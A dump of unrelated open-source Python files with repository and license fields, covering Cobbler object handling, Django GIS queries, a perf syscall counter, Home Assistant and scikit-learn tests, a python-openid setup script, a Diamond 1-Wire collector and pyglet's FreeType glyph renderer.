Reset this object.
"""
utils.clear_from_fields(self, self.get_fields(), is_subobject=is_subobject)
def make_clone(self):
"""
Must be defined in any subclass
"""
raise NotImplementedException()
def from_dict(self, _dict):
"""
Modify this object to take on values in seed_data
"""
utils.from_dict_from_fields(self, _dict, self.get_fields())
def to_dict(self):
# return utils.to_dict_from_fields(self, self.get_fields())
value = self.get_from_cache(self)
if value is None:
value = utils.to_dict_from_fields(self, self.get_fields())
self.set_cache(self, value)
return value
def to_string(self):
return utils.to_string_from_fields(self, self.get_fields())
def get_setter_methods(self):
return utils.get_setter_methods_from_fields(self, self.get_fields())
def set_uid(self, uid):
self.uid = uid
def get_children(self, sorted=True):
"""
Get direct children of this object.
"""
keys = list(self.children.keys())
if sorted:
keys.sort()
results = []
for k in keys:
results.append(self.children[k])
return results
def get_descendants(self, sort=False):
"""
Get objects that depend on this object, i.e. those that
would be affected by a cascading delete, etc.
With sort=True the list will be a walk of the tree,
e.g., distro -> [profile, sys, sys, profile, sys, sys]
"""
results = []
kids = self.get_children(sorted=sort)
if not sort:
results.extend(kids)
for kid in kids:
if sort:
results.append(kid)
grandkids = kid.get_descendants(sort=sort)
results.extend(grandkids)
return results
def get_parent(self):
"""
For objects with a tree relationship, what's the parent object?
"""
return None
def get_conceptual_parent(self):
"""
The parent may just be a superclass for something like a
subprofile. Get the first parent of a different type.
"""
mtype = type(self)
parent = self.get_parent()
while parent is not None:
ptype = type(parent)
if mtype != ptype:
self.conceptual_parent = parent
return parent
parent = parent.get_parent()
return None
def set_name(self, name):
"""
Set the objects name.
@param: str name (object name string)
@returns: True or CX
"""
self.name = validate.object_name(name, self.parent)
def set_comment(self, comment):
if comment is None:
comment = ""
self.comment = comment
def set_owners(self, data):
"""
The owners field is a comment unless using an authz module that pays attention to it,
like authz_ownership, which ships with Cobbler but is off by default.
"""
self.owners = utils.input_string_or_list(data)
def set_kernel_options(self, options):
"""
Kernel options are a space delimited list,
like 'a=b c=d e=f g h i=j' or a dict.
"""
(success, value) = utils.input_string_or_dict(options, allow_multiples=True)
if not success:
raise CX(_("invalid kernel options"))
else:
self.kernel_options = value
def set_kernel_options_post(self, options):
"""
Post kernel options are a space delimited list,
like 'a=b c=d e=f g h i=j' or a dict.
"""
(success, value) = utils.input_string_or_dict(options, allow_multiples=True)
if not success:
raise CX(_("invalid post kernel options"))
else:
self.kernel_options_post = value
def set_autoinstall_meta(self, options):
"""
A comma delimited list of key value pairs, like 'a=b,c=d,e=f' or a dict.
The meta tags are used as input to the templating system
to preprocess automatic installation template files
"""
(success, value) = utils.input_string_or_dict(options, allow_multiples=True)
if not success:
return False
else:
self.autoinstall_meta = value
def set_mgmt_classes(self, mgmt_classes):
"""
Assigns a list of configuration management classes that can be assigned
to any object, such as those used by Puppet's external_nodes feature.
"""
mgmt_classes_split = utils.input_string_or_list(mgmt_classes)
self.mgmt_classes = utils.input_string_or_list(mgmt_classes_split)
def set_mgmt_parameters(self, mgmt_parameters):
"""
A YAML string which can be assigned to any object, this is used by
Puppet's external_nodes feature.
"""
if mgmt_parameters == "<<inherit>>":
self.mgmt_parameters = mgmt_parameters
else:
import yaml
data = yaml.safe_load(mgmt_parameters)
if type(data) is not dict:
raise CX(_("Input YAML in Puppet Parameter field must evaluate to a dictionary."))
self.mgmt_parameters = data
def set_template_files(self, template_files):
"""
A comma seperated list of source=destination templates
that should be generated during a sync.
"""
(success, value) = utils.input_string_or_dict(template_files, allow_multiples=False)
if not success:
return False
else:
self.template_files = value
def set_boot_files(self, boot_files):
"""
A comma seperated list of req_name=source_file_path
that should be fetchable via tftp
"""
(success, value) = utils.input_string_or_dict(boot_files, allow_multiples=False)
if not success:
return False
else:
self.boot_files = value
def set_fetchable_files(self, fetchable_files):
"""
A comma seperated list of virt_name=path_to_template
that should be fetchable via tftp or a webserver
"""
(success, value) = utils.input_string_or_dict(fetchable_files, allow_multiples=False)
if not success:
return False
else:
self.fetchable_files = value
def sort_key(self, sort_fields=[]):
data = self.to_dict()
return [data.get(x, "") for x in sort_fields]
def find_match(self, kwargs, no_errors=False):
# used by find() method in collection.py
data = self.to_dict()
for (key, value) in list(kwargs.items()):
# Allow ~ to negate the compare
if value is not None and value.startswith("~"):
res = not self.find_match_single_key(data, key, value[1:], no_errors)
else:
res = self.find_match_single_key(data, key, value, no_errors)
if not res:
return False
return True
def find_match_single_key(self, data, key, value, no_errors=False):
# special case for systems
key_found_already = False
if "interfaces" in data:
if key in ["mac_address", "ip_address", "netmask", "virt_bridge",
"dhcp_tag", "dns_name", "static_routes", "interface_type",
"interface_master", "bonding_opts", "bridge_opts",
"interface"]:
key_found_already = True
for (name, interface) in list(data["interfaces"].items()):
if value == name:
return True
if value is not None and key in interface:
if self.__find_compare(interface[key], value):
return True
if key not in data:
if not key_found_already:
if not no_errors:
# FIXME: removed for 2.0 code, shouldn't cause any problems to not have an exception here?
# raise CX(_("searching for field that does not exist: %s" % key))
return False
else:
if value is not None: # FIXME: new?
return False
if value is None:
return True
else:
return self.__find_compare(value, data[key])
def dump_vars(self, data, format=True):
raw = utils.blender(self.collection_mgr.api, False, self)
if format:
return pprint.pformat(raw)
else:
return raw
def set_depth(self, depth):
self.depth = depth
def set_ctime(self, ctime):
self.ctime = ctime
def set_mtime(self, mtime):
self.mtime = mtime
def set_parent(self, parent):
self.parent = parent
def check_if_valid(self):
"""
Raise exceptions if the object state is inconsistent
"""
if not self.name:
raise CX("Name is required")
# EOF
|
gpl-2.0
|
inteos/IBAdmin
|
restore/models.py
|
1
|
1062
|
# -*- coding: UTF-8 -*-
#
# Copyright (c) 2015-2019 by Inteos Sp. z o.o.
# All rights reserved. See LICENSE file for details.
#
from __future__ import unicode_literals
from django.db import models
"""
class Permissions(models.Model):
class Meta:
managed = False
permissions = (
('restore_jobs', 'Can restore jobs'),
('restore_jobs', 'Can add files jobs'),
('change_jobs', 'Can change jobs'),
('advanced_jobs', 'Can change jobs advanced'),
('delete_jobs', 'Can delete jobs'),
('run_jobs', 'Can run jobs'),
('restore_jobs', 'Can restore jobs'),
('cancel_jobs', 'Can cancel running jobs'),
('stop_jobs', 'Can stop running jobs'),
('restart_jobs', 'Can restart failed jobs'),
('comment_jobs', 'Can comment jobs'),
('view_datalocation', 'Can view jobs data location'),
('delete_jobid', 'Can delete jobs history'),
('status_jobs', 'Can view running job status'),
)
"""
|
agpl-3.0
|
daivietpda/sense-l
|
tools/perf/scripts/python/sctop.py
|
11180
|
1924
|
# system call top
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Periodically displays system-wide system call totals, broken down by
# syscall. If a [comm] arg is specified, only syscalls called by
# [comm] are displayed. If an [interval] arg is specified, the display
# will be refreshed every [interval] seconds. The default interval is
# 3 seconds.
import os, sys, thread, time
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s sctop.py [comm] [interval]\n";
for_comm = None
default_interval = 3
interval = default_interval
if len(sys.argv) > 3:
sys.exit(usage)
if len(sys.argv) > 2:
for_comm = sys.argv[1]
interval = int(sys.argv[2])
elif len(sys.argv) > 1:
try:
interval = int(sys.argv[1])
except ValueError:
for_comm = sys.argv[1]
interval = default_interval
syscalls = autodict()
def trace_begin():
thread.start_new_thread(print_syscall_totals, (interval,))
pass
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals(interval):
while 1:
clear_term()
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
try:
print "%-40s %10d\n" % (syscall_name(id), val),
except TypeError:
pass
syscalls.clear()
time.sleep(interval)
|
gpl-2.0
|
revpoint/prefs-n-perms
|
prefs_n_perms/sections.py
|
1
|
1192
|
from prefs_n_perms.client import db
from prefs_n_perms.permissions import Permissions
from prefs_n_perms.preferences import Preferences
from prefs_n_perms.settings import preference_settings
class Section(object):
prefix = preference_settings.SECTIONS_PREFIX
def __init__(self, name, **kwargs):
self.name = name
def __str__(self):
return self.name
@property
def section_key(self):
return ':'.join((self.prefix, self.name))
def exists(self):
return self.section_key in db
@property
def has_preferences(self):
return Preferences(self).exists()
@property
def has_permissions(self):
return Permissions(self).exists()
def get_preferences(self, **kwargs):
return Preferences(self, **kwargs)
def get_permissions(self, **kwargs):
return Permissions(self, **kwargs)
@property
def tiers(self):
return db.List(self.section_key)
@tiers.setter
def tiers(self, value):
if not isinstance(value, (tuple, list)):
raise ValueError
if self.exists():
db.api.delete(self.section_key)
db.List(self.section_key, value)
|
mit
|
adrienbrault/home-assistant
|
tests/components/trace/test_utils.py
|
2
|
1169
|
"""Test trace helpers."""
from datetime import timedelta
from homeassistant import core
from homeassistant.components import trace
from homeassistant.util import dt as dt_util
def test_json_encoder(hass):
"""Test the Trace JSON Encoder."""
ha_json_enc = trace.utils.TraceJSONEncoder()
state = core.State("test.test", "hello")
# Test serializing a datetime
now = dt_util.utcnow()
assert ha_json_enc.default(now) == now.isoformat()
# Test serializing a timedelta
data = timedelta(
days=50,
seconds=27,
microseconds=10,
milliseconds=29000,
minutes=5,
hours=8,
weeks=2,
)
assert ha_json_enc.default(data) == {
"__type": str(type(data)),
"total_seconds": data.total_seconds(),
}
# Test serializing a set()
data = {"milk", "beer"}
assert sorted(ha_json_enc.default(data)) == sorted(data)
# Test serializong object which implements as_dict
assert ha_json_enc.default(state) == state.as_dict()
# Default method falls back to repr(o)
o = object()
assert ha_json_enc.default(o) == {"__type": str(type(o)), "repr": repr(o)}
|
mit
|
bfirsh/django-old
|
django/contrib/gis/db/models/sql/query.py
|
379
|
5314
|
from django.db import connections
from django.db.models.query import sql
from django.contrib.gis.db.models.fields import GeometryField
from django.contrib.gis.db.models.sql import aggregates as gis_aggregates
from django.contrib.gis.db.models.sql.conversion import AreaField, DistanceField, GeomField
from django.contrib.gis.db.models.sql.where import GeoWhereNode
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Area, Distance
ALL_TERMS = dict([(x, None) for x in (
'bbcontains', 'bboverlaps', 'contained', 'contains',
'contains_properly', 'coveredby', 'covers', 'crosses', 'disjoint',
'distance_gt', 'distance_gte', 'distance_lt', 'distance_lte',
'dwithin', 'equals', 'exact',
'intersects', 'overlaps', 'relate', 'same_as', 'touches', 'within',
'left', 'right', 'overlaps_left', 'overlaps_right',
'overlaps_above', 'overlaps_below',
'strictly_above', 'strictly_below'
)])
ALL_TERMS.update(sql.constants.QUERY_TERMS)
class GeoQuery(sql.Query):
"""
A single spatial SQL query.
"""
# Overridding the valid query terms.
query_terms = ALL_TERMS
aggregates_module = gis_aggregates
compiler = 'GeoSQLCompiler'
#### Methods overridden from the base Query class ####
def __init__(self, model, where=GeoWhereNode):
super(GeoQuery, self).__init__(model, where)
# The following attributes are customized for the GeoQuerySet.
# The GeoWhereNode and SpatialBackend classes contain backend-specific
# routines and functions.
self.custom_select = {}
self.transformed_srid = None
self.extra_select_fields = {}
def clone(self, *args, **kwargs):
obj = super(GeoQuery, self).clone(*args, **kwargs)
# Customized selection dictionary and transformed srid flag have
# to also be added to obj.
obj.custom_select = self.custom_select.copy()
obj.transformed_srid = self.transformed_srid
obj.extra_select_fields = self.extra_select_fields.copy()
return obj
def convert_values(self, value, field, connection):
"""
Using the same routines that Oracle does we can convert our
extra selection objects into Geometry and Distance objects.
TODO: Make converted objects 'lazy' for less overhead.
"""
if connection.ops.oracle:
# Running through Oracle's first.
value = super(GeoQuery, self).convert_values(value, field or GeomField(), connection)
if value is None:
# Output from spatial function is NULL (e.g., called
# function on a geometry field with NULL value).
pass
elif isinstance(field, DistanceField):
# Using the field's distance attribute, can instantiate
# `Distance` with the right context.
value = Distance(**{field.distance_att : value})
elif isinstance(field, AreaField):
value = Area(**{field.area_att : value})
elif isinstance(field, (GeomField, GeometryField)) and value:
value = Geometry(value)
return value
def get_aggregation(self, using):
# Remove any aggregates marked for reduction from the subquery
# and move them to the outer AggregateQuery.
connection = connections[using]
for alias, aggregate in self.aggregate_select.items():
if isinstance(aggregate, gis_aggregates.GeoAggregate):
if not getattr(aggregate, 'is_extent', False) or connection.ops.oracle:
self.extra_select_fields[alias] = GeomField()
return super(GeoQuery, self).get_aggregation(using)
def resolve_aggregate(self, value, aggregate, connection):
"""
Overridden from GeoQuery's normalize to handle the conversion of
GeoAggregate objects.
"""
if isinstance(aggregate, self.aggregates_module.GeoAggregate):
if aggregate.is_extent:
if aggregate.is_extent == '3D':
return connection.ops.convert_extent3d(value)
else:
return connection.ops.convert_extent(value)
else:
return connection.ops.convert_geom(value, aggregate.source)
else:
return super(GeoQuery, self).resolve_aggregate(value, aggregate, connection)
# Private API utilities, subject to change.
def _geo_field(self, field_name=None):
"""
Returns the first Geometry field encountered; or specified via the
`field_name` keyword. The `field_name` may be a string specifying
the geometry field on this GeoQuery's model, or a lookup string
to a geometry field via a ForeignKey relation.
"""
if field_name is None:
# Incrementing until the first geographic field is found.
for fld in self.model._meta.fields:
if isinstance(fld, GeometryField): return fld
return False
else:
# Otherwise, check by the given field name -- which may be
# a lookup to a _related_ geographic field.
return GeoWhereNode._check_geo_field(self.model._meta, field_name)
|
bsd-3-clause
|
miipl-naveen/optibizz
|
addons/stock_picking_wave/wizard/picking_to_wave.py
|
382
|
1624
|
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class stock_picking_to_wave(osv.osv_memory):
_name = 'stock.picking.to.wave'
_description = 'Add pickings to a picking wave'
_columns = {
'wave_id': fields.many2one('stock.picking.wave', 'Picking Wave', required=True),
}
def attach_pickings(self, cr, uid, ids, context=None):
#use active_ids to add picking line to the selected wave
wave_id = self.browse(cr, uid, ids, context=context)[0].wave_id.id
picking_ids = context.get('active_ids', False)
return self.pool.get('stock.picking').write(cr, uid, picking_ids, {'wave_id': wave_id})
|
agpl-3.0
|
keedio/hue
|
desktop/core/ext-py/python-openid-2.2.5/setup.py
|
56
|
1682
|
import sys
import os
from distutils.core import setup
if 'sdist' in sys.argv:
os.system('./admin/makedoc')
version = '[library version:2.2.5]'[17:-1]
setup(
name='python-openid',
version=version,
description='OpenID support for servers and consumers.',
long_description='''This is a set of Python packages to support use of
the OpenID decentralized identity system in your application. Want to enable
single sign-on for your web site? Use the openid.consumer package. Want to
run your own OpenID server? Check out openid.server. Includes example code
and support for a variety of storage back-ends.''',
url='http://github.com/openid/python-openid',
packages=['openid',
'openid.consumer',
'openid.server',
'openid.store',
'openid.yadis',
'openid.extensions',
'openid.extensions.draft',
],
# license specified by classifier.
# license=getLicense(),
author='JanRain',
author_email='[email protected]',
download_url='http://github.com/openid/python-openid/tarball/%s' % (version,),
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX",
"Programming Language :: Python",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: CGI Tools/Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: System :: Systems Administration :: Authentication/Directory",
],
)
|
apache-2.0
|
numerigraphe/stock-logistics-warehouse
|
__unported__/stock_available_immediately/__openerp__.py
|
5
|
1363
|
# -*- coding: utf-8 -*-
#
#
# Author: Guewen Baconnier
# Copyright 2010-2012 Camptocamp SA
# Copyright (C) 2011 Akretion Sébastien BEAU <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
{
"name": "Immediately Usable Stock Quantity",
"version": "1.0",
"depends": ["product", "stock", ],
"author": "Camptocamp",
"license": "AGPL-3",
"description": """
Compute the immediately usable stock.
Immediately usable is computed : Quantity on Hand - Outgoing Stock.
""",
"website": "http://tinyerp.com/module_account.html",
"category": "Generic Modules/Stock",
"data": ["product_view.xml",
],
"active": False,
'installable': False
}
|
agpl-3.0
|
acquia/Diamond
|
src/collectors/onewire/onewire.py
|
53
|
2416
|
# coding=utf-8
"""
The OneWireCollector collects data from 1-Wire Filesystem
You can configure which sensors are read in two way:
- add section [scan] with attributes and aliases,
(collector will scan owfs to find attributes)
or
- add sections with format id:$SENSOR_ID
See also: http://owfs.org/
Author: Tomasz Prus
#### Dependencies
* owfs
"""
import os
import diamond.collector
class OneWireCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(OneWireCollector, self).get_default_config_help()
config_help.update({
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(OneWireCollector, self).get_default_config()
config.update({
'path': 'owfs',
'owfs': '/mnt/1wire',
# 'scan': {'temperature': 't'},
# 'id:24.BB000000': {'file_with_value': 'alias'},
})
return config
def collect(self):
"""
Overrides the Collector.collect method
"""
metrics = {}
if 'scan' in self.config:
for ld in os.listdir(self.config['owfs']):
if '.' in ld:
self.read_values(ld, self.config['scan'], metrics)
for oid, files in self.config.iteritems():
if oid[:3] == 'id:':
self.read_values(oid[3:], files, metrics)
for fn, fv in metrics.iteritems():
self.publish(fn, fv, 2)
def read_values(self, oid, files, metrics):
"""
Reads values from owfs/oid/{files} and update
metrics with format [oid.alias] = value
"""
oid_path = os.path.join(self.config['owfs'], oid)
oid = oid.replace('.', '_')
for fn, alias in files.iteritems():
fv = os.path.join(oid_path, fn)
if os.path.isfile(fv):
try:
f = open(fv)
v = f.read()
f.close()
except:
self.log.error("Unable to read %s", fv)
raise
try:
v = float(v)
except:
self.log.error("Unexpected value %s in %s", v, fv)
raise
metrics["%s.%s" % (oid, alias)] = v
|
mit
|
LiaoPan/scikit-learn
|
sklearn/neighbors/tests/test_nearest_centroid.py
|
305
|
4121
|
"""
Testing for the nearest centroid module.
"""
import numpy as np
from scipy import sparse as sp
from numpy.testing import assert_array_equal
from numpy.testing import assert_equal
from sklearn.neighbors import NearestCentroid
from sklearn import datasets
from sklearn.metrics.pairwise import pairwise_distances
# toy sample
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
X_csr = sp.csr_matrix(X) # Sparse matrix
y = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
T_csr = sp.csr_matrix(T)
true_result = [-1, 1, 1]
# also load the iris dataset
# and randomly permute it
iris = datasets.load_iris()
rng = np.random.RandomState(1)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
def test_classification_toy():
# Check classification on a toy dataset, including sparse versions.
clf = NearestCentroid()
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
# Same test, but with a sparse matrix to fit and test.
clf = NearestCentroid()
clf.fit(X_csr, y)
assert_array_equal(clf.predict(T_csr), true_result)
# Fit with sparse, test with non-sparse
clf = NearestCentroid()
clf.fit(X_csr, y)
assert_array_equal(clf.predict(T), true_result)
# Fit with non-sparse, test with sparse
clf = NearestCentroid()
clf.fit(X, y)
assert_array_equal(clf.predict(T_csr), true_result)
# Fit and predict with non-CSR sparse matrices
clf = NearestCentroid()
clf.fit(X_csr.tocoo(), y)
assert_array_equal(clf.predict(T_csr.tolil()), true_result)
def test_precomputed():
clf = NearestCentroid(metric="precomputed")
clf.fit(X, y)
S = pairwise_distances(T, clf.centroids_)
assert_array_equal(clf.predict(S), true_result)
def test_iris():
# Check consistency on dataset iris.
for metric in ('euclidean', 'cosine'):
clf = NearestCentroid(metric=metric).fit(iris.data, iris.target)
score = np.mean(clf.predict(iris.data) == iris.target)
assert score > 0.9, "Failed with score = " + str(score)
def test_iris_shrinkage():
# Check consistency on dataset iris, when using shrinkage.
for metric in ('euclidean', 'cosine'):
for shrink_threshold in [None, 0.1, 0.5]:
clf = NearestCentroid(metric=metric,
shrink_threshold=shrink_threshold)
clf = clf.fit(iris.data, iris.target)
score = np.mean(clf.predict(iris.data) == iris.target)
assert score > 0.8, "Failed with score = " + str(score)
def test_pickle():
import pickle
# classification
obj = NearestCentroid()
obj.fit(iris.data, iris.target)
score = obj.score(iris.data, iris.target)
s = pickle.dumps(obj)
obj2 = pickle.loads(s)
assert_equal(type(obj2), obj.__class__)
score2 = obj2.score(iris.data, iris.target)
assert_array_equal(score, score2,
"Failed to generate same score"
" after pickling (classification).")
def test_shrinkage_threshold_decoded_y():
clf = NearestCentroid(shrink_threshold=0.01)
y_ind = np.asarray(y)
y_ind[y_ind == -1] = 0
clf.fit(X, y_ind)
centroid_encoded = clf.centroids_
clf.fit(X, y)
assert_array_equal(centroid_encoded, clf.centroids_)
def test_predict_translated_data():
# Test that NearestCentroid gives same results on translated data
rng = np.random.RandomState(0)
X = rng.rand(50, 50)
y = rng.randint(0, 3, 50)
noise = rng.rand(50)
clf = NearestCentroid(shrink_threshold=0.1)
clf.fit(X, y)
y_init = clf.predict(X)
clf = NearestCentroid(shrink_threshold=0.1)
X_noise = X + noise
clf.fit(X_noise, y)
y_translate = clf.predict(X_noise)
assert_array_equal(y_init, y_translate)
def test_manhattan_metric():
# Test the manhattan metric.
clf = NearestCentroid(metric='manhattan')
clf.fit(X, y)
dense_centroid = clf.centroids_
clf.fit(X_csr, y)
assert_array_equal(clf.centroids_, dense_centroid)
assert_array_equal(dense_centroid, [[-1, -1], [1, 1]])
|
bsd-3-clause
|
jpaalasm/pyglet
|
pyglet/font/freetype.py
|
26
|
13163
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import ctypes
from ctypes import *
from warnings import warn
import pyglet.lib
from pyglet.font import base
from pyglet import image
from pyglet.font.freetype_lib import *
from pyglet.compat import asbytes
# fontconfig library definitions
fontconfig = pyglet.lib.load_library('fontconfig')
FcResult = c_int
fontconfig.FcPatternBuild.restype = c_void_p
fontconfig.FcPatternCreate.restype = c_void_p
fontconfig.FcFontMatch.restype = c_void_p
fontconfig.FcFreeTypeCharIndex.restype = c_uint
fontconfig.FcPatternAddDouble.argtypes = [c_void_p, c_char_p, c_double]
fontconfig.FcPatternAddInteger.argtypes = [c_void_p, c_char_p, c_int]
fontconfig.FcPatternAddString.argtypes = [c_void_p, c_char_p, c_char_p]
fontconfig.FcConfigSubstitute.argtypes = [c_void_p, c_void_p, c_int]
fontconfig.FcDefaultSubstitute.argtypes = [c_void_p]
fontconfig.FcFontMatch.argtypes = [c_void_p, c_void_p, c_void_p]
fontconfig.FcPatternDestroy.argtypes = [c_void_p]
fontconfig.FcPatternGetFTFace.argtypes = [c_void_p, c_char_p, c_int, c_void_p]
fontconfig.FcPatternGet.argtypes = [c_void_p, c_char_p, c_int, c_void_p]
FC_FAMILY = asbytes('family')
FC_SIZE = asbytes('size')
FC_SLANT = asbytes('slant')
FC_WEIGHT = asbytes('weight')
FC_FT_FACE = asbytes('ftface')
FC_FILE = asbytes('file')
FC_WEIGHT_REGULAR = 80
FC_WEIGHT_BOLD = 200
FC_SLANT_ROMAN = 0
FC_SLANT_ITALIC = 100
FT_STYLE_FLAG_ITALIC = 1
FT_STYLE_FLAG_BOLD = 2
(FT_RENDER_MODE_NORMAL,
FT_RENDER_MODE_LIGHT,
FT_RENDER_MODE_MONO,
FT_RENDER_MODE_LCD,
FT_RENDER_MODE_LCD_V) = range(5)
def FT_LOAD_TARGET_(x):
return (x & 15) << 16
FT_LOAD_TARGET_NORMAL = FT_LOAD_TARGET_(FT_RENDER_MODE_NORMAL)
FT_LOAD_TARGET_LIGHT = FT_LOAD_TARGET_(FT_RENDER_MODE_LIGHT)
FT_LOAD_TARGET_MONO = FT_LOAD_TARGET_(FT_RENDER_MODE_MONO)
FT_LOAD_TARGET_LCD = FT_LOAD_TARGET_(FT_RENDER_MODE_LCD)
FT_LOAD_TARGET_LCD_V = FT_LOAD_TARGET_(FT_RENDER_MODE_LCD_V)
(FT_PIXEL_MODE_NONE,
FT_PIXEL_MODE_MONO,
FT_PIXEL_MODE_GRAY,
FT_PIXEL_MODE_GRAY2,
FT_PIXEL_MODE_GRAY4,
FT_PIXEL_MODE_LCD,
FT_PIXEL_MODE_LCD_V) = range(7)
(FcTypeVoid,
FcTypeInteger,
FcTypeDouble,
FcTypeString,
FcTypeBool,
FcTypeMatrix,
FcTypeCharSet,
FcTypeFTFace,
FcTypeLangSet) = range(9)
FcType = c_int
(FcMatchPattern,
FcMatchFont) = range(2)
FcMatchKind = c_int
class _FcValueUnion(Union):
_fields_ = [
('s', c_char_p),
('i', c_int),
('b', c_int),
('d', c_double),
('m', c_void_p),
('c', c_void_p),
('f', c_void_p),
('p', c_void_p),
('l', c_void_p),
]
class FcValue(Structure):
_fields_ = [
('type', FcType),
('u', _FcValueUnion)
]
# End of library definitions
def f16p16_to_float(value):
return float(value) / (1 << 16)
def float_to_f16p16(value):
return int(value * (1 << 16))
def f26p6_to_float(value):
return float(value) / (1 << 6)
def float_to_f26p6(value):
return int(value * (1 << 6))
class FreeTypeGlyphRenderer(base.GlyphRenderer):
def __init__(self, font):
super(FreeTypeGlyphRenderer, self).__init__(font)
self.font = font
def render(self, text):
face = self.font.face
FT_Set_Char_Size(face, 0, self.font._face_size,
self.font._dpi, self.font._dpi)
glyph_index = fontconfig.FcFreeTypeCharIndex(byref(face), ord(text[0]))
error = FT_Load_Glyph(face, glyph_index, FT_LOAD_RENDER)
if error != 0:
raise base.FontException(
'Could not load glyph for "%c"' % text[0], error)
glyph_slot = face.glyph.contents
width = glyph_slot.bitmap.width
height = glyph_slot.bitmap.rows
baseline = height - glyph_slot.bitmap_top
lsb = glyph_slot.bitmap_left
advance = int(f26p6_to_float(glyph_slot.advance.x))
mode = glyph_slot.bitmap.pixel_mode
pitch = glyph_slot.bitmap.pitch
if mode == FT_PIXEL_MODE_MONO:
# BCF fonts always render to 1 bit mono, regardless of render
# flags. (freetype 2.3.5)
bitmap_data = cast(glyph_slot.bitmap.buffer,
POINTER(c_ubyte * (pitch * height))).contents
data = (c_ubyte * (pitch * 8 * height))()
data_i = 0
for byte in bitmap_data:
# Data is MSB; left-most pixel in a byte has value 128.
data[data_i + 0] = (byte & 0x80) and 255 or 0
data[data_i + 1] = (byte & 0x40) and 255 or 0
data[data_i + 2] = (byte & 0x20) and 255 or 0
data[data_i + 3] = (byte & 0x10) and 255 or 0
data[data_i + 4] = (byte & 0x08) and 255 or 0
data[data_i + 5] = (byte & 0x04) and 255 or 0
data[data_i + 6] = (byte & 0x02) and 255 or 0
data[data_i + 7] = (byte & 0x01) and 255 or 0
data_i += 8
pitch <<= 3
elif mode == FT_PIXEL_MODE_GRAY:
# Usual case
data = glyph_slot.bitmap.buffer
else:
raise base.FontException('Unsupported render mode for this glyph')
# pitch should be negative, but much faster to just swap tex_coords
img = image.ImageData(width, height, 'A', data, pitch)
glyph = self.font.create_glyph(img)
glyph.set_bearings(baseline, lsb, advance)
t = list(glyph.tex_coords)
glyph.tex_coords = t[9:12] + t[6:9] + t[3:6] + t[:3]
return glyph
